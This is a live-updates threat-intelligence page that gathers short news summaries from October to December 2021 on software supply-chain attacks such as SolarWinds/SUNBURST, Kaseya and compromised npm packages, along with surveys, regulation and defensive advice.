Go to listing page
Live Updates: Supply-Chain Attacks - SolarWinds/Solorigate (SUNBURST), Kaseya VSA, and More
Share Blog Post
An alleged Russia-backed hacking group is believed to have targeted and breached the U.S. Departments of Treasury and Commerce. According to Reuters, the breach originated from a supply chain attack that leveraged Orion - the widely-used network monitoring tool from SolarWinds, an IT company that supports several federal agencies and the U.S. military. Last week, cybersecurity company FireEye had reported a similar attack carried out via the SolarWinds platform that led to the compromise of its “red teaming” tools. It is believed that a large number of organizations that use this software might be at risk. The malware used in this widespread "UNC2452" campaign is being tracked by several names including Solorigate and SUNBURST.
Cyware has created this resource to collect and share live alerts on this campaign, impacted organizations as reported in the media, indicators of compromise (IOCs), and other relevant threat intelligence. We are actively working to keep this page updated and accurate in order to ensure that it is timely and relevant to as many people as possible.
Solutions and Countermeasures
Advisories
Indicators of Compromise (IOCs)
Threat Response Workflow
Killswitch
Network Auditing Tool
_______________________________________________________________________________________
(Dec 3, 2021)
SolarWinds Attack: One Year Later, Cybersecurity Lessons for Pros
Several analysts and cybersecurity watchers agree that software and IT supply chains, along with vulnerabilities associated with third-party suppliers, remain the greatest lesson learned from this past year’s events. And while software developers have been asking the right questions and trying to adapt, adversaries continue to adjust their techniques to remain that crucial step ahead.
_______________________________________________________________________________________
(Dec 3, 2021)
72% of MSPs Take Action After Headline About Cyber Attack
As a result of the SolarWinds incident, among those MSPs who were affected (28%), almost all (98%) took at least some action to respond to the incident and prevent more attacks in the future. The most common steps were switching to other IT security software providers (44%), updating contract terms and liability with suppliers (42%), and hiring additional security experts (39%).
_______________________________________________________________________________________
(Dec 2, 2021)
Maximize Security by Managing Versioning Based on Attack Potential
On October 22, NPM and GitHub announced that the popular UA-Parser-JS library had been hijacked for distributing malware. Some of the world’s most popular software applications use the library, from the likes of Apple, Mozilla, Elastic, and Facebook. This attack demonstrated how attackers can easily weaponize a small piece of the software supply chain on a global scale.
Ref - SC Magazine
_______________________________________________________________________________________
(Dec 2, 2021)
Securing the Modern Software Supply Chain
Collective safety concerns are a vital issue when openly collaborating on and engaging with open-source software. These actions increase the risk of accidentally leaking or sharing confidential information that is then exposed to the public eye. To avoid this potential data exposure, developers should not be storing sensitive information in a repository, in config or code.
_______________________________________________________________________________________
(Dec 1, 2021)
Why Protection Against Supply Chain Attacks is a Must
It’s no wonder, then, that over two-thirds of all the code running on the average website today comes from third parties. And here is where security concerns arise. In the context of a website, every single piece of third-party code has the exact same permissions as any remaining code that was developed internally.
_______________________________________________________________________________________
(Nov 30, 2021)
A Multipronged Approach to Protect ICT Supply Chains from Cyberattacks
Given the integrated nature of ICT supply chain resilience, there is a need to develop core principles, technical standards, and regulatory frameworks to ensure a consistent level of cybersecurity. Governments must continue to drive nationwide efforts to establish a baseline level of cybersecurity across sectors through laws, regulations, guidelines, training requirements, and awareness-building.
_______________________________________________________________________________________
(Nov 30, 2021)
Defending the Global Software Supply Chain from Cyberattacks in 2021
In 2021, Linux Foundation’s communities rose to the challenge of providing tools and best practices for the security hardening of the global software supply chains. Its efforts included launching Open Source Security Foundation (OpenSSF) as a funded project, expanding Let’s Encrypt, ensuring the ISO standardization of SPDX as the SBOM standard, directing funds to identify and fix vulnerabilities in critical open source software, and building a new training curriculum to improve secure coding practices.
_______________________________________________________________________________________
(Nov 29, 2021)
Thousands of GitHub Users Unknowingly Risking Account Takeovers and Supply Chain Attacks
Login cookies of thousands of Firefox users are available on request from GitHub repositories, according to security engineer Aidan Marlin. The London-based rail service Trainline employee contacted GitHub about the leak, but the company responded that user-leaked credentials were beyond the scope of its bounty program.
_______________________________________________________________________________________
(Nov 23, 2021)
Supply Chain Attacks, Ransomware will Again Make Headlines in 2022
The European Union Agency for Cybersecurity (ENISA) predicted supply chain attacks to quadruple in 2021 compared to last year. ENISA’s report – Threat Landscape for Supply Chain Attacks, analyzed 24 recent attacks and found that strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers.
_______________________________________________________________________________________
(Nov 23, 2021)
Clearing up Confusion on Supply Chain Attacks
A Zero Trust approach addresses many of the security concerns around supply chain attacks – not necessarily to prevent them but to contain the spread of malware and “massively limit the amount of damage” that can occur. To reduce risk and potentially prevent an attack from significantly impacting your business, organizations need to Shift from a reactive to a proactive approach to cybersecurity.
_______________________________________________________________________________________
(Nov 22, 2021)
Effective Software Security Activities for Managing Supply Chain Risks
The BSIMM12 report highlights how companies are responding and illustrates the software security activities adopted by companies in the BSIMM community over the last year. According to the report, the U.S. National Institute of Standards and Technology (NIST) has developed a Cyber Supply Chain Risk Management (C-SCRM) and Secure Software Development Framework that provides recommendations on how to manage supply chain risk.
_______________________________________________________________________________________
(Nov 20, 2021)
Know The Risks Posed By Your Third Parties And Supply Chain
Only 41% of Canadian survey respondents (40% globally) say they thoroughly understand the risk of data breaches through third parties, using formal enterprise-wide assessments. Nearly a quarter in Canada and globally have little or no understanding of all of these risks—a major blind spot of which cyber attackers are well aware and willing to exploit.
_______________________________________________________________________________________
(Nov 19, 2021)
Open-source Leaders Seek To Fill the Gaps in Software Supply Chain Security
The challenge of protecting open-source software, which is built by many contributors, is akin to securing a bank vault where everyone is free to come and go as they please. What’s inside is extremely valuable, but there are no guards or locks on the vault door. Enterprises have a desire to put in additional controls and analysis for software supply chain security to reduce risk. One of the problems is that open source is so pervasive.
_______________________________________________________________________________________
(Nov 19, 2021)
Palo Alto’s Unit 42: Poor Supply Chain Hygiene Impacts Cloud Infrastructure
Palo Alto Network‘s in-house threat research team, Unit 42, analyzed data from a variety of public data sources around the globe and came up with conclusions about the growing threats the software supply chains of organizations face daily. Their findings indicate that many organizations may have a false sense of security in the cloud and reality, are vastly unprepared for the threats they face.
_______________________________________________________________________________________
(Nov 18, 2021)
The UK Pushes For Better Supply Chain Cybersecurity
If the UK Government gets its way, IT service vendors and other cloud-based service providers may soon be required to adopt new measures to strengthen their cybersecurity, amid rising concerns about supply chain risks. The Department for Digital, Culture, Media, and Sport (DCMS) has floated plans to make mandatory compliance with the National Cyber Security Centre’s Cyber Assessment Framework, which provides guidance for organizations responsible for vitally important services and activities.
_______________________________________________________________________________________
(Nov 18, 2021)
Supply Chain Security Fears Escalate as Iranian APTs Caught Hitting IT Services Sector
Two of Redmond’s premier threat hunting units, the Microsoft Threat Intelligence Center (MSTIC) and Microsoft Digital Security Unit (DSU), are sounding the alarm for a series of intrusions at companies that sell business management and integration software to millions of global organizations. Once inside the IT services organizations, Microsoft said the Iranian hackers are extending their attacks to compromise downstream customers, much like the SolarWinds supply chain mega-hack that snagged thousands of corporate victims globally.
Ref - SecurityWeek
_______________________________________________________________________________________
(Nov 18, 2021)
Iranian Targeting Of IT Sector On The Rise
Microsoft has observed multiple Iranian threat actors targeting the IT services sector in attacks that aim to steal sign-in credentials belonging to downstream customer networks to enable further attacks. This activity is notable because targeting third parties has the potential to exploit more sensitive organizations by taking advantage of trust and access in a supply chain.
_______________________________________________________________________________________
(Nov 18, 2021)
From Growing Supply Chain Attacks To Ransomware Gangs: Top Cybersecurity Predictions for 2022
According to HP’s report on Top Cybersecurity Predictions for 2022, supply chain attacks are likely to continue to present new opportunities for threat actors in 2022. Both SMBs and high-profile victims may be targeted. Kaseya demonstrated a pathway to monetization for independent software vendor (ISV) breaches. This should be a wake-up call to all ISVs that even if their customer base doesn’t consist of enterprise and government customers, they can still be caught in the crosshairs of attackers looking to exploit their customers.
_______________________________________________________________________________________
(Nov 17, 2021)
SolarWinds Actors Are Scoping Out Hub Companies To Go After Prized Targets
The Russian APT group known as Cozy Bear doesn’t hibernate for long, and in late October Microsoft warned that the nation-state actor was trying to replicate the success of its SolarWinds supply chain attack — this time by compromising IT resellers and tech/cloud service providers and then impersonating them in order to target their customers.
_______________________________________________________________________________________
(Nov 17, 2021)
Symantec Security Summary - Supply Chain Attacks Are Surging
Supply chain attacks are surging, according to data breach reports. New information from the Identity Theft Resource Center (ITRC) claims that a total of 793,000 more individuals have been affected by supply chain attacks this year so far than in all of 2020. The North Korean group Lazarus (aka Appleworm) is the latest to mount software supply chain attacks, according to new research from Kaspersky.
Ref - Symantec
_______________________________________________________________________________________
(Nov 17, 2021)
Cyber-risk Driven by Ransomware, Supply Chain Attacks, and Trojans
FS-ISAC, a global cyber-intelligence sharing community focused on financial services, has announced that ransomware and supply chain attacks, as well as the resurgence of banking trojans and distributed denial of service (DDoS) attacks, are the top cybersecurity threats to financial institutions across the Asia Pacific (APAC) region.
_______________________________________________________________________________________
(Nov 16, 2021)
Government Plans Regulation to Bolster Supply Chain Security
Government regulation could be on the way to force improvements in supply chain security after industry feedback and new research pointed to gaps in protection. The government trailed several possible “interventions'' to improve the situation, including providing more advice and guidance, improved access to a skilled workforce and the right products, and regulation — which was reportedly described as “very effective” by more respondents than any other option.
_______________________________________________________________________________________
(Nov 16, 2021)
New Type of Supply Chain Attack Could Put Popular Admin Tools at Risk
Research between Intezer and Checkmarx describes ChainJacking, a type of software supply chain attack that could be potentially exploited by threat actors and puts common admin tools at risk. An attacker slipping through the cracks between the designs of GitHub and Go Package Manager could allow them to take control over popular Go packages, poison them, and infect both developers and users.
_______________________________________________________________________________________
(Nov 16, 2021)
Majority of UK's Top Business Leaders Are Failing To Manage Supply Chain Security Risks
Fresh research from the Department for Culture, Media, and Sport (DCMS) has revealed less than a third of business leaders in the UK's top companies are actively managing cyber security risks in the supply chain. Just 28% of respondents replied strongly in favor when asked if they actively manage vulnerabilities in the supply chain, despite 97% of businesses being impacted by supply chain attacks in the past year.
_______________________________________________________________________________________
(Nov 16, 2021)
How Self-Learning AI Protects McLaren Racing From Supply Chain Attacks
McLaren Racing recently witnessed a cyber attack in which 12 employees were targeted in a systematic phishing attack, receiving an email from a long-established team supplier, notifying them that a voicemail had been left for them. The link to play the voicemail led to a legitimate-looking voicemail service site. When following the link to access the message, the site requested Office 365 credentials to authenticate the user, designed to harvest the McLaren Racing credentials.
_______________________________________________________________________________________
(Nov 15, 2021)
Home Affairs Launches New Principles For Critical Technology Supply Chain Security
The federal government has released a new set of voluntary principles aimed at providing guidance to organizations in how they protect critical technologies from cyber attacks. Labeled the Critical Technology Supply Chain Principles, Minister of Home Affairs Karen Andrews said the voluntary principles were designed to give organizations and consumers the confidence to allocate more resources towards critical emerging technologies such as artificial intelligence, quantum computing, blockchain, and algorithmic automation.
_______________________________________________________________________________________
(Nov 15, 2021)
Call for Views on Cyber Security in Supply Chains and Managed Service Providers
The UK Government has issued a ‘Call for Views’ that focuses on further understanding two aspects of supply chain cyber security. Part 1 seeks input on how organizations across the market manage supply chain cyber risk and what additional government intervention would enable organizations to do this more effectively. Part 2 then seeks input on the suitability of a proposed framework for Managed Service Provider security and how this framework could most appropriately be implemented to ensure adequate baseline security to manage the risks associated with Managed Service Providers.
_______________________________________________________________________________________
(Nov 15, 2021)
Hackers Are Threatening The Global Supply Chain
As the global supply chain struggles from the aftershocks of the pandemic, spreading the suffering to nearly every industry, cyber-criminal vultures are descending on the vulnerabilities to create more dangerous disruption. According to a report from cyber intelligence firm Intel 471, all key sectors in the global supply chain are now being targeted by cybercriminals.
_______________________________________________________________________________________
(Nov 15, 2021)
3 Reasons To Use A Zero-trust Approach For Supply Chain Cybersecurity
Rather than assuming that a company or product is secure, a zero-trust approach requires verification for all assets, user accounts, or applications — the authentication for their access to your systems must be approved. Even users within your own technology infrastructure must confirm their data every time they request access to any resource inside or outside the network.
_______________________________________________________________________________________
(Nov 13, 2021)
MSPAlliance Leadership Council Forms Vendor Council to Address Managed Services Supply Chain Risk
The International Association of Cloud & Managed Service Providers (MSPAlliance) announced several significant breakthroughs in the fight against managed services supply chain vendor attacks. Among the most significant announcements is the creation of Vendor Verify, a new certification designed to raise transparency and cybersecurity resiliency amongst supply chain vendors commonly used by managed service providers (MSPs).
_______________________________________________________________________________________
(Nov 11, 2021)
Supply Chains Facing New 'Backdoor' Cyberattack Peril
The global supply chain is facing a new form of a cyberattack: the ‘hub attack’ where hackers target businesses seemingly unconnected to supply as a means of gaining back-door access to high-value supply targets. Such companies - in fields such as insurance, credit clearing, and SaaS - can provide thousands of links to potentially more-valuable suppliers and large customers, such as banks and companies in the energy and weapons sectors.
_______________________________________________________________________________________
(Nov 11, 2021)
How to Prevent Supply Chain Attacks with the Zero Trust Architecture (ZTA)
The components of a Zero Trust Architecture (ZTA) can either reside onsite or through a cloud-based service. All unverified network activity is fed between the Policy Decision Point and the Policy Enforcement Point. Only requests that pass strict Policy Engine requirements are permitted to flow through to all Enterprise Resources.
Ref - Upguard
_______________________________________________________________________________________
(Nov 11, 2021)
Why Social Graphing Won’t Protect From Supply Chain Compromise
Social graphs work by comparing emails against risk criteria to determine if a particular email message is potentially dangerous in the context it’s being sent in. But in supply chain compromise situations, the email address used won’t set off alarm bells because it is a legitimate email account. Cybercriminals who gain unauthorized access to an authentic email account can entirely bypass social graph safeguards.
_______________________________________________________________________________________
(Nov 11, 2021)
GoCD Bug Chain Provides Second Springboard for Supply Chain Attacks
The maintainers of GoCD, a widely used, open-source tool that automates the continuous delivery (CD) of software, have addressed three vulnerabilities that, if chained, could lead to the underlying server being taken over. The security flaws, comprising CVE-2021-43288, CVE-2021-43286, and CVE-2021-43289, could lead to supply chain attacks.
Ref - PortSwigger
_______________________________________________________________________________________
(Nov 11, 2021)
Popular npm Library Compromised in a Supply Chain Attack - Additional Research
In late October, a supply chain attack affected a popular npm library, ua-parser-js, which put many companies at risk of compromise. In this incident, attackers inserted malicious code into three versions of the popular npm library ua-parser-js after seemingly taking over the developer’s npm account. In this attack, the attacker flooded the developer’s email account with hundreds of spam emails (called an email bomb attack).
_______________________________________________________________________________________
(Nov 11, 2021)
Javascript – Website Supply Chain Puts Online Retail At Risk
As website supply chains become more complex and opaque, it’s difficult for organizations to establish precisely how many of these integrations are running on their websites – or who owns and manages them. A lot of the time, they’re added by marketing or web teams, outside the software development lifecycle, often bypassing code reviews and testing. When security teams are rarely part of the development cycle, they lack insight into when/where third-party code is used.
_______________________________________________________________________________________
(Nov 9, 2021)
Secure Software Supply Chain: Why Every Link Matters
As any company or product is just a piece in the overall software supply chain, security measures related to the supply chain can be applied on three different points: 1) Inputs: Library and package dependencies, third-party tools, software, services, or any artifact you are consuming, either public or from a private vendor. 2) Outputs: Guarantee the integrity of your deliverables and provide ways to verify the components downstream. 3) Processes and infrastructure: Protect your network, identities, credentials, signature keys, repositories, and processes.
_______________________________________________________________________________________
(Nov 9, 2021)
Supply Chain Attacks Impact Nearly Every Business
ENISA, the European Union Agency for Cybersecurity, monitors supply chain attacks. They have developed a taxonomy of supply chain attacks to allow for systematic analysis[1]. The taxonomy is based on four fundamental elements of a supply chain attack: 1) Attack technique used to compromise the supplier, 2) Supplier assets targeted, 3) Attack technique used to compromise the customer, and 4) Customer assets targeted.
_______________________________________________________________________________________
(Nov 7, 2021)
A Journey in Organizational Resilience: Supply Chain and Third Parties
In 2021, ISO reviewed and made current ISO 28001: Security management systems for the supply chain - Best practices for implementing supply chain security, assessments and plans - Requirements and guidance. And for some extremely detailed guidance, including some control mapping back to NIST SP 800-53, those concerned with supply chains can reference NIST SP 800-161 Supply Chain Risk Management Practices for Federal Information Systems and Organizations.
_______________________________________________________________________________________
(Nov 7, 2021)
Two NPM Packages With 22 Million Weekly Downloads Found Backdoored
Two popular NPM packages with cumulative weekly downloads of nearly 22 million were found to be compromised with malicious code by gaining unauthorized access to the respective developer's accounts. The two libraries in question are "coa," a parser for command-line options, and "rc," a configuration loader, both of which were tampered with by an unidentified threat actor to include "identical" password-stealing malware.
_______________________________________________________________________________________
(Nov 7, 2021)
Supply Chain Under Attack As 'Dark' Cyber Underground Peddles Sensitive Company Data
Cyber thieves have gotten hold of the credentials by leveraging vulnerabilities in remote access technologies such as Remote Desktop Protocol (RDP), Virtual Private Networks (VPN), Citrix, and SonicWall, among others, Intel 471 said. As of 2020, all four of the largest global maritime shipping companies had been hit by cyber attacks.
_______________________________________________________________________________________
(Nov 5, 2021)
Best Practices For A Secure Software Supply Chain
The use of open source today is significant and is not expected to slow down anytime soon. Given that we are not going to stop using open-source software, the threat to supply chain security is unpatched software. Various tools and techniques are provided by NuGet and GitHub, such as NuGet dependency graph, NuGet dependency graph, etc., which can be used to address potential risks inside a project.
_______________________________________________________________________________________
(Nov 5, 2021)
Cybercriminals are Targeting Open Source Supply Chain
After years of attacking networks and custom software, enterprising hackers found an easier attack vector and switched to attacking the application development process itself. Even better, attackers need not break into an organization’s source repository. Instead, they simply add their malicious code to common open-source projects used by organizations and wait for the developers to add the code to proprietary applications themselves.
_______________________________________________________________________________________
(Nov 5, 2021)
North Korean Lazarus Hacking Group Leverages Supply Chain Attacks To Distribute Malware
North Korean threat actor Lazarus group has resorted to supply chain attacks similar to SolarWinds and Kaseya to compromise the regime’s targets. Kaspersky’s Q3 2021 APT Trends report says that Lazarus developed an infection chain that stemmed from legitimate South Korean security software deploying a malicious payload.
_______________________________________________________________________________________
(Nov 4, 2021)
Controlling the Supply Chain Attack Supplier Shockwave
Knowing your suppliers is key when it comes to understanding and assessing the supply chain to isolate blind spots and protect against looming threats. To ensure infosec can protect IT ecosystems, for example, it’s important to know whether your suppliers are asynchronous, synchronous, or a technology or service provider.
_______________________________________________________________________________________
(Nov 4, 2021)
Cybercriminals Increase Attacks on Vulnerable Retailers as Global Supply Chain Crisis Worsens
Cybercriminals are increasing attacks on vulnerable retailers as the global supply chain crisis continues, according to Imperva. The cybersecurity firm has released the State of Security Within eCommerce report, a 12-month analysis on cybersecurity risks in the retail industry that suggests that the 2021 holiday shopping season will be further disrupted by cybercriminals looking to create chaos and take advantage of an unprecedented global supply chain crisis.
Ref - Security Brief
_______________________________________________________________________________________
(Nov 3, 2021)
Supply Chain Attacks Emphasizes the Need to Stay Careful with Third-party Providers
There are three of the biggest supply chain security threats that organizations and governments need to be aware of. Data protection is vital in certain industries such as health care, fintech, and e-commerce, but with these industries ever-growing and profitable, attackers and bad actors have plenty of incentive to launch attacks. Organizations must use best practices for handling threats and enforce new standards on how their employees and suppliers access and share data. Moreover, although better products are good for the market, working with external partners also increases the risk to the supply chain.
_______________________________________________________________________________________
(Nov 3, 2021)
Linux Foundation adds software supply chain security to LFX
To address the growing threat of software supply chain attacks, the Linux Foundation is upgrading its LFX Security module to deal with these attacks. Enhanced and free to use, LFX Security makes it easier for open-source projects to secure their code. Specifically, the LFX Security module now includes automatic scanning for secrets-in-code and non-inclusive language.
Ref - ZDNet
_______________________________________________________________________________________
(Nov 3, 2021)
Attackers flaunt remote access credentials, threaten supply chain
Network access brokers, the cybercriminals who trade in credentials needed to compromise corporate computers, have advertised and sold credentials for a variety of global shipping and logistics companies in the past few months, threatening the already-overburdened supply chain infrastructure. Threat intelligence firm Intel 471 reports that targeted organizations include a Japanese container shipping firm, trucking, and transportation companies in the United States, and a logistics firm in the United Kingdom.
Ref - Dark Reading
_______________________________________________________________________________________
(Nov 2, 2021)
Trojan Source bugs may lead to extensive supply-chain attacks on source code
Cambridge University researchers have detailed a new way targeted vulnerabilities can be introduced into source code while making them invisible to human code reviewers, allowing for extensive supply-chain attacks. CVE-2021-42574 is a vulnerability in the bidirectional algorithm in the Unicode Specification. CVE-2021-42694 is an exploitable issue in the character definitions of the Unicode Specification.
_______________________________________________________________________________________
(Nov 1, 2021)
Businesses and governments urged to take action over Trojan Source supply chain attacks
Businesses and governments have been urged to take action to protect themselves against hacking attacks that are capable of injecting invisible backdoors into the source code of widely used programming languages. Trojan Source attacks can be used by hackers or hostile states to launch powerful attacks against software supply chains by depositing doctored code in libraries and software repositories such as GitHub.
_______________________________________________________________________________________
(Nov 1, 2021)
Dissecting supply chain attacks in the aftermath of the Solarwinds Hack
A major reason why such attacks were left untended is a lack of constant visibility and monitoring over the organization’s entire network. Large multinationals have some of the most complex security policies that one can ever witness, with a veritable bedlam of tools that create an intricate web of vulnerabilities. In addition, multiple tools being used to secure multiple assets
leads to an opaque environment in terms of visibility.
_______________________________________________________________________________________
(Nov 1, 2021)
Bolstering cybersecurity risk management with SBOMS
On May 12, 2021, the White House issued a formal executive order (EO) 14028 aimed at fortifying the nation’s cybersecurity posture, including enhancing software supply chain security. And in October 2021, the DHS Software Supply Chain Risk Management Act of 2021 was passed by the U.S. House of Representatives in a 412-2 vote. Under the bill, the Under Secretary for Management will be required to issue department-wide guidelines for identifying materials used in software development.
_______________________________________________________________________________________
(Oct 29, 2021)
SolarMarker attackers use SEO poisoning to push malicious code
Cybercriminals leveraging the SolarMarker .NET-based backdoor are using a technique called SEO poisoning to drive malicious payloads into victims’ systems so they can gain access to the credentials and data within. According to researchers at Menlo Security, the SolarMarker campaign is one of two such efforts they’ve seen in recent months using SEO poisoning to deceive users and get them to download the malicious payload into their systems.
_______________________________________________________________________________________
(Oct 29, 2021)
Russian hackers behind SolarWinds attack actively targeting tech supply chains - Microsoft
Microsoft’s security researchers find that the Russian hackers behind the devastating SolarWinds attack are putting a particular emphasis on IT services resellers, impersonating them to compromise their downstream customers. It is believed that the campaign’s focus is on installing backdoors for long-term use in intelligence gathering on subjects of interest to the Russian government.
_______________________________________________________________________________________
(Oct 28, 2021)
Many businesses are concerned about a ransomware supply chain attack
Businesses may have solid cybersecurity protections in place, keeping them safe from malware, ransomware, and various social engineering attacks. However, many are under the impression that they could easily be attacked via the supply chain, and that in some cases, an attack would be “unavoidable”. Surveying 1,001 IT managers for the report, Osirium found that three-quarters (77 percent) worry about ransomware risks through the supply chain, a figure that rises to 82 percent when the company depends on outsourced IT services.
Ref - IT Proportal
_______________________________________________________________________________________
(Oct 28, 2021)
3 Security lessons learned from the Kaseya ransomware attack
Organizations can better prepare themselves and their customers for these attacks with some strategies to identify threats before they become a widespread issue. Organizations should trust no one, and follow Zero Trust as a prevention mechanism. They should have an effective incident response with clearly defined policies. They must also have information sharing for a proactive security posture.
_______________________________________________________________________________________
(Oct 28, 2021)
Critical flaw in GoCD provides a platform for supply chain attacks
A critical vulnerability in popular CI/CD tool GoCD could allow unauthenticated attackers to extract encrypted secrets and poison software build processes – potentially paving the way to supply chain attacks. The maintainers of the open-source, Java-built platform have addressed the arbitrary file read flaw along with several other bugs discovered by Swiss security firm SonarSource.
_______________________________________________________________________________________
(Oct 27, 2021)
Lazarus APT uses updated malware in potential supply chain attacks
Researchers with Kaspersky, in their APT trends report for the third quarter of 2021, said the Lazarus group leveraged an updated version of the DeathNote malware, which is known to send data about the compromised host and fetch a next-stage payload, as well as the Racket downloader. Through these attacks, the group was able to execute a malicious payload to target a think tank in South Korea, said, researchers.
_______________________________________________________________________________________
(Oct 27, 2021)
The time has come to embrace the Zero-Trust model of cybersecurity
The Zero-Trust model has been widely recognized as an effective approach to prevent data breaches and mitigate the risk of supply chain attacks. Now is the time to embrace Zero-Trust, as the pandemic accelerates the adoption of Cloud and remote working technologies, and businesses grapple with more stringent regulation. There is no silver bullet product and no unique way to implement Zero-Trust; it requires a layered security approach that covers the entire digital infrastructure.
_______________________________________________________________________________________
(Oct 27, 2021)
North Korea's Lazarus group turns to supply chain attacks
Security researchers from Kaspersky recently discovered two separate campaigns where the Lazarus Group infiltrated the network of an IT company — likely as part of a broader strategy to compromise its downstream customers. In one of the incidents, Lazarus Group gained access to a South Korean security software vendor's network and abused the company's software to deploy two remote access Trojans (RATs) called Blindingcan and Copperhedge on a South Korean think tank's network.
_______________________________________________________________________________________
(Oct 25, 2021)
Check Point Software 2022 cybersecurity predictions
It is predicted that supply chain attacks will become more common and governments will begin to establish regulations to address these attacks and protect networks. They will also look into collaborating with the private sectors as well as other countries to identify and target more threat groups operating on a global and regional scale.
_______________________________________________________________________________________
(Oct 25, 2021)
Supply chain cyberattacks causing ‘staggeringly high’ damage
Research from cybersecurity company BlueVoyant showed just how much companies are struggling to deal with these supply chain cyberattacks. The research, detailed in a recent study conducted by Opinion Matters and overseen by BlueVoyant, was the second global survey into how companies are handling third-party cyber-risks. The study polled over 1,200 high-ranking technology executives in a variety of industries in six countries: the U.S., Canada, Germany, The Netherlands, the United Kingdom, and Singapore.
_______________________________________________________________________________________
(Oct 24, 2021)
New activity from Russian actor Nobelium
Nobelium attackers are active again, and now attacking a different part of the supply chain: resellers and other technology service providers that customize, deploy, and manage cloud services and other technologies on behalf of their customers. Microsoft believes Nobelium ultimately hopes to piggyback on any direct access that resellers may have to their customers’ IT systems and more easily impersonate an organization’s trusted technology partner to gain access to their downstream customers.
_______________________________________________________________________________________
(Oct 22, 2021)
53% of companies are left exposed to supply chain attacks
Acronis has released its annual Cyber Readiness Report this week, providing a comprehensive overview of the modern cybersecurity landscape. Based on findings from this year's independent survey of 3,600 IT managers and remote employees in 18 countries across the globe, the report states that 53% of global companies have a false sense of security when it comes to supply chain attacks.
Ref - The Week
_______________________________________________________________________________________
(Oct 22, 2021)
Supply chain attack: NPM library used by Facebook and others was compromised
The developer of the ‘ua-parser-js’ NPM package has found that attackers had uploaded a version of his software that contained malware for both Linux and Windows computers. The malicious versions were found to steal data (including passwords and Chrome cookies, perhaps much more) from computers or run a crypto-currency miner. This prompted GitHub to issue a Critical Severity Security Advisory.
_______________________________________________________________________________________
(Oct 21, 2021)
Detecting anomalies with TLS fingerprints could pinpoint supply chain compromises
Researchers from security analytics firm Splunk have recently analyzed several such techniques that rely on building unique fingerprints to identify which software applications establish HTTPS connections. The premise is that malware programs, regardless of how they're delivered, often come with their own TLS libraries or TLS configuration and their HTTPS handshakes would be identifiable in traffic logs when compared to TLS client hashes of pre-approved applications.
_______________________________________________________________________________________
(Oct 21, 2021)
Supply chain attacks are a bigger risk than ever
When it comes to defending against supply chain attacks, the majority of organizations feel confident in their ability to stay safe. However, more than half (53 percent) are more vulnerable than they realize, a report from security firm Acronis suggests. Based on a survey of 3,600 IT managers and remote employees working at SMBs, the report asserts that most companies are under a barrage of cyberattacks, but do not deploy industry-standard protection measures.
_______________________________________________________________________________________
(Oct 21, 2021)
Microsoft, Intel, and Goldman Sachs to lead new TCG Work Group to tackle supply chain security challenges
Trusted Computing Group (TCG) has today announced a new workgroup that will define how TCG technologies can be implemented to address supply chain security challenges. Led by representatives from Microsoft, Intel, and Goldman Sachs, the workgroup will create guidance that defines, implements, and upholds security standards for the entire supply chain.
_______________________________________________________________________________________
(Oct 21, 2021)
Securing the open-source software supply chain
CVE matching and remediation information enable an organization to build a secure supply chain tailored to its unique needs and policies. For example, one foundational cybersecurity practice is to consult CVE databases and scores regularly to guard against the risk of using vulnerable packages and binaries in applications.
_______________________________________________________________________________________
(Oct 21, 2021)
How organizations can tackle supply chain attacks
Organizations and their information security teams can protect their networks from such attacks by ensuring that infrastructures that do not need to be directly connected to the Internet are not connected. Lindy Cameron, CEO of the National Cyber Security Centre (NCSC), explained what companies need to do.
Ref - IT World Canada
_______________________________________________________________________________________
(Oct 20, 2021)
Supply chain attacks are the hacker's new favorite weapon
Several major incidents during the past 12 months have demonstrated the large-scale consequences supply chain attacks can have. Some of these attacks have been identified because they've been on such a large scale. But there are means of supply chain compromise that are far less likely to draw attention but can be very effective. And a more tightly focused campaign might be harder to detect.
Ref - ZDNet
_______________________________________________________________________________________
(Oct 20, 2021)
House approves bill to strengthen IT supply chain following SolarWinds hack
The House on Wednesday approved legislation to strengthen software and information technology supply chains at the Department of Homeland Security (DHS) and to help protect against attacks similar to last year’s SolarWinds hack. The DHS Software Supply Chain Risk Management Act, sponsored by Rep. Ritchie Torres (D-N.Y.) passed the lower chamber overwhelmingly by a vote of 412-2.
_______________________________________________________________________________________
(Oct 19, 2021)
Protect your open source project from supply chain attacks
The year 2021 has also been the year of supply chain security solutions. While there’s still plenty of work to be done and plenty of room for improvement in existing solutions, there are preventative controls users can apply to their projects to harden the supply chain and prevent compromise. Google Open Source has provided some recommendations along with the SLSA framework and OpenSSF Scorecards rubric.
_______________________________________________________________________________________
(Oct 18, 2021)
How CIOs can prepare for supply chain security issues heading into 2022
In addition to the logistical nightmare, an attack on the supply chain can incur millions of dollars in recovery costs. From 2020 to 2021, there was a 10% increase in the average cost of a data breach, bringing the average total cost to $4.24 million. Using tactics like ransomware and phishing, cyberattacks have also increased both in severity and frequency this year.
_______________________________________________________________________________________
(Oct 18, 2021)
Third-party attacks are increasing, but third-party risk management is failing
Over the last year, the number of companies reporting an increase in budget for third-party security risk management has increased from 81% to 91% – but that hasn’t translated into a meaningful improvement in tackling the risk. The main problem is it is still frequently treated as a GRC issue; that is, an annual perhaps paper-based audit for each third-party vendor. This does not reflect the continuous and ongoing nature of third-party risk.
_______________________________________________________________________________________
(Oct 18, 2021)
Defending against the threat of software supply chain attacks
In order to minimize the risk of supply chain attacks, businesses should therefore aim to narrow their exposed perimeter, primarily by reducing the number of external suppliers they work with. As Toyota does with its hardware supply chain, the focus should shift to relying on fewer suppliers with whom a relationship of deep trust and understanding is built.
_______________________________________________________________________________________
(Oct 17, 2021)
Enterprises are scrambling to deploy zero trust security
Ericom’s first Zero Trust Market Dynamics Survey assesses the market’s perception of the zero-trust security framework, explores organizations’ plans for adoption and implementation, and identifies key issues that inhibit their moves to zero trust. Approximately 1,300 security and risk professionals participated in Ericom’s July 2021 survey.
_______________________________________________________________________________________
(Oct 15, 2021)
Supply chain risk – It’s the moment of truth
Today’s supply chain risk programs just aren’t keeping pace with the rapidly changing business and technology environment. Assessments are largely manual, relying on spreadsheet-based, point-in-time questionnaires. When self-reporting assessments are issued, confidence in the results is low. Assessment frequency is also insufficient.
_______________________________________________________________________________________
(Oct 15, 2021)
Vulnerabilities in most public cloud containers could lead to supply chain attacks
According to the Unit 42 Cloud Threat Report 2H 2021 report, 96% of third-party container applications deployed in cloud infrastructure contain known vulnerabilities. And 63% of third-party code templates used in building cloud infrastructure contained insecure configurations.
_______________________________________________________________________________________
(Oct 15, 2021)
Shoring up cybersecurity in critical infrastructure and the nation's defense supply chain
